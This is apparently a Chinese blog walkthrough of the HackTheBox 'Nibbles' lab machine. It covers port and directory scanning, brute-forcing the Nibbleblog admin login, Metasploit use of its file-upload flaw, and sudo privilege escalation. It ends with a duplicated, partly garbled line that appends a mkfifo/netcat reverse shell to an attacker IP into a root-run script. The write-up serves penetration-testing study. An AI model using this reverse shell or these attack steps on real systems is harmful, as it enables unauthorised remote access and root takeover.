Linux/Nibbles

已于 2024-01-12 16:42:24 修改
阅读量1.1k 收藏
点赞数
分类专栏: HackTheBox 文章标签: 网络安全 web安全
于 2022-10-09 19:24:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45557138/article/details/127232440
版权

nmap

同样的,先用nmap探测目标端口开放情况

nmap -sV -sC -oA nmap 10.10.10.75

可以看到开启了80端口,先探索一下http服务,寻找更多内容

http服务

没有什么有用的发现,只是一个很简单的hello world

根据burpsuite抓的包可以看到apache的版本内容以及一个目录/nibbleblog

根据提示目录可以看到一个展示页面,页面右下角有一个powerd by nibbleblog

很可能是一个博客框架,借助浏览器可以知道确实是一个博客系统,据查也可以得知v4.0.5版本存在很多漏洞,鉴于目前并不能知道靶机使用版本,因此尝试执行目录扫描

gobuster

直接对/nibbleblog进行目录的暴力枚举

gobuster dir -u http://10.10.10.75/nibbleblog/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w / -x txt,php -t 50 -k -o gobuster

/admin.php

是一个登录页面

在/content/private/user.xml中找到用户名,尝试暴力破解

使用hydra针对用户名amdin进行暴力破解,猜测用户名与nibbles相关,加入字典中执行暴力破解,最终得到用户名和密码

暴力破解触发零 保护机制,重新将靶机还原使用用户名和密码登录系统后,界面如下

metasploit

在settings中可以看到博客版本信息

并且该版本有一个任意文件上传漏洞

然后根据相关信息设置配置项

然后执行即可,并获取交互式shell

user.txt

CVE-2015-6967

提权

鉴于之前的靶场,直接sudo -l

先把personal.zip解压,然后查看该文件内容

在文件末尾添加,然后运行该文件即可

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8083 > /tmp/f" >> monitor.sh < /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8083 > /tmp/f" >> monitor.sh

ve9etable
关注
专栏目录
hackthebox-Nibbles(考点:nibbles安全&上传/linux修改脚本)
冬萍子癸水
04-11 450
nmap 点开80,太简洁 dirbuster扫一扫,扫不出什么, 没什么信息,只能继续信息搜集,ctrl+u,看到这个 ok这是个nibbles博客,查一查就知道是个博客系统。提示了这个新目录 重现拿dirbuster扫这个新目录。发现登陆页面 没有账号密码信息,暴力破解之前,要先猜弱口令。因为有nibble,所以和admin这些混合起来猜。 还好不难,admin+nibbles 进入到...
HackTheBox-nibbles渗透测试
weixin_43111940的博客
04-20 182
端口 sudo nmap -sC -sV -A -p 22,80 10.10.10.75 访问80端口,提示了一个目录 访问 扫描目录 发现admin.php和readme 找到了版本号 搜到了对应的漏洞 https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html 尝试登录一下admin.php,密码就是靶机的名称(惊不惊喜,这脑洞谁能想到) 找到漏洞发生的文件上传的点 上传shell 找
HackTheBox::Nibbles
aya3t的博客
10-11 130
HackTheBox::Nibbles
Hack the box靶机 nibbles
菜浪马废的博客
05-20 243
源码里有提示 /nibbleblog 右下角 Nibbleblog 但是不知道版本号 dirb扫一下目录吧 巨烦扫目录 太慢了 大佬们有没有解决方案 我是能不用msf尽量不用 毕竟考试只有一次 但是! 他*的只有msf的漏洞 那只能用了 好久不用都快忘了 ...
Nibbles - Hack the box
neal1991的专栏
03-17 459
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
Linux Nibbles-开源
04-27
Linux Nibbles 开源详解】 Linux Nibbles是一款开源的游戏软件,它的设计灵感来源于经典的“蛇”游戏,但在此基础上进行了创新。游戏的核心玩法是操控一条在屏幕上移动的蛇,避开各种障碍物以获取分数。与传统的...
Nibbles:在Windows,Linux和macOS上运行基于.NET Core的基于控制台的简单蛇游戏
05-13
因为它是为.NET Core构建的,所以它可以在.NET Core支持的任何平台上运行,例如Windows 10(周年更新或更高版本),Linux和macOS。 作为控制台应用程序,它使用Linux / macOS终端以及Windows 10周年更新(版本1607...
nibbles daemon-开源
07-06
Nibbles 守护进程。 半字节网络客户端的游戏服务器。
NGE_Nibbles-开源
04-26
NGE_NibblesNibbles(旧的街机游戏)的克隆。 NGE_Nibbles使用DJGPP编译器以C ++进行编码,并且可以在DOS和Windows 9x下运行。 您可以使用内部脚本语言和sprites / fonts抓取器快速添加关卡和美术。
nibbles:轻咬吃苹果
03-09
nibbles:轻咬吃苹果——Linux上的C语言编程实践》 在计算机世界里,"nibbles"这个名字常被用来指代一个经典的基于字符界面的游戏,它在Linux系统上尤为常见。这个游戏的设计灵感来自于著名的"蛇"游戏,玩家通过...
HackTheBox - Nibbles Write Up
ak.Gh0st的博客
04-01 224
HackTheBox - Nibbles - Write Up
废物的靶场日记 htb-oscp-nibbles
m0_53302733的博客
03-28 914
废物的靶场日记 htb-oscp-nibbles 简单的就不分割了 sudo nmap -sV -A -sC --min-rate=5000 -p- 10.10.10.75 -Pn 经典22 80 22/tcp open tcpwrapped 80/tcp open tcpwrapped 访问发现只有一句hello world!其他啥也没 纯纯的ctf了属于是 F12看到 /nibbleblog/ directory. Nothing interesting here! 进去看到一个网站 searc
HTB打靶日记:Nibbles
m0_73998094的博客
12-26 548
HTB打靶日记:Nibbles
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 388
申请IP地址SSL证书
网络安全防御【防火墙NAT智能选举综合实验】
最新发布
miss_copper的博客
07-13 851
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1233
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
智能车的网络安全隐患及其防护技术
tigerman20201的博客
07-13 215
本文分析了智能车的主要网络安全威胁,包括车辆通信系统、自动驾驶系统、以及车载娱乐系统的潜在风险。在此基础上,提出了多层次的安全防护技术,包括加密通信、入侵检测系统、以及区块链技术等,以提升智能车的网络安全水平。智能车的网络安全是一个复杂且重要的问题,需要多层次、多方面的技术防护。通过加密通信、入侵检测系统、区块链技术等多种手段的结合,可以有效提升智能车的安全性,保障乘客和行人的安全。未来,随着技术的进步和标准的完善,智能车的网络安全将得到进一步的保障。**题目:智能车的网络安全隐患及其防护技术**
解释下面代码static UINT8 libTXT2PDU( UINT8* msgData, UINT16 msgLen, UINT8* pTpdu, AtciMsgInfo *pAtSmsMessage, AtciCharacterSet chset_type ) { UINT8 offset = 0; UINT16 len=0; //CPUartLogPrintf("%s: enter", __FUNCTION__); //int i; //for(i=0;i<msgLen;i++) //CPUartLogPrintf("%s: msgData[%d] %d 0x%x", __FUNCTION__, i, msgData[i], msgData[i]); /* Copy the first octet */ /*SIMCom xiaokai.yang sync sms code @2023-02-06 begin*/ #ifdef FEATURE_SIMCOM_SMS char headbuf[PDU_HEAD_SIZE] = {0x05,0x00,0x03}; scCmssexInfoT* p_CmgsexInfo = (scCmssexInfoT*)getCmgsexInfoInd(); if(pAtSmsMessage->udhPresent) { pTpdu[ offset++ ] = (pAtSmsMessage->fo)|(0x1<<6); } else #endif /*SIMCom xiaokai.yang sync sms code @2023-02-06 end*/ pTpdu[ offset++ ] = pAtSmsMessage->fo; /* Message Reference */ pTpdu[ offset++ ] = pAtSmsMessage->msgRef; /* Originating Address (TP-OA) */ { UINT8 idx; UINT8 *data; data = pTpdu + offset; /* Set the Address Length octet */ *data++ = strlen( (char *)pAtSmsMessage->destAddr ); #ifdef FEATURE_SIMCOM_SMS PAL_LogIo(SC_MODULE_SMS,PAL_DBG_LEVEL_INFO,"destAddr [%s]",( (char *)pAtSmsMessage->destAddr )); #endif /* Format the TON/NPI octet */ *data++ = (UINT8)((pAtSmsMessage->addrType << 4) | pAtSmsMessage->addrPlan | 0x80); /* Format the BCD digits */ for ( idx = 0; idx < strlen( (char *)pAtSmsMessage->destAddr ); idx++ ) { libPutPackedBcd( data, idx, pAtSmsMessage->destAddr[ idx ], TRUE ); } /* check if we need to tack on a filler */ if( idx & 0x01 ) { /* Yup -- do it! , reversed nibbles */ libPutPackedBcd( data, idx, ATCI_BCD_FILLER, TRUE ); ++idx; } /* We're done -- update the PDU byte index */ offset += idx/2 + ATCI_SMS_BCD_POS; } /* Protocol Identifier (TP-PID) */ pTpdu[ offset++ ] = pAtSmsMessage->pid; /* Data Coding Scheme (TP-DCS) */ pTpdu[ offset++ ] = pAtSmsMessage->dcs; if(((pAtSmsMessage->fo&ATCI_TP_MTI_MASK)==ATCI_SMS_SUBMIT_MTI)&&((pAtSmsMessage->fo&ATCI_SMS_TP_VPF)==0x10)) { pTpdu[ offset++ ] = pAtSmsMessage->vp; } /*SIMCom xiaokai.yang sync sms code @2023-02-06 begin*/ #ifdef FEATURE_SIMCOM_SMS if(pAtSmsMessage->udhPresent) { headbuf[3] = p_CmgsexInfo->mr; headbuf[4] = p_CmgsexInfo->msg_total; headbuf[5] = p_CmgsexInfo->msg_seg; memmove(msgData+PDU_HEAD_SIZE,msgData,msgLen); memcpy(msgData, headbuf, PDU_HEAD_SIZE); msgLen+=PDU_HEAD_SIZE; } PAL_LogIo(SC_MODULE_SMS,PAL_DBG_LEVEL_INFO,"offset1 [%d],msgLen=%d",offset,msgLen);//274 #endif /*SIMCom xiaokai.yang sync sms code @2023-02-06 end*/ /* Now for the Message Data (TP-UDL + TP-UD) */ //ScShowDataByHex((char *)pTpdu, offset); //CPUartLogPrintf("[sms]msgLen=%d",msgLen); libMsgEncodeUserData( pAtSmsMessage->udhPresent, pAtSmsMessage->dcs, pTpdu, msgData, msgLen, offset, &len,chset_type); return len; }
06-08
这段代码是一个函数,名为libTXT2PDU,其作用是将短信数据从文本格式转化为PDU格式。它的参数包括短信数据的指针msgData、短信数据长度msgLen、PDU数据的指针pTpdu、AtciMsgInfo结构体指针pAtSmsMessage和字符集类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值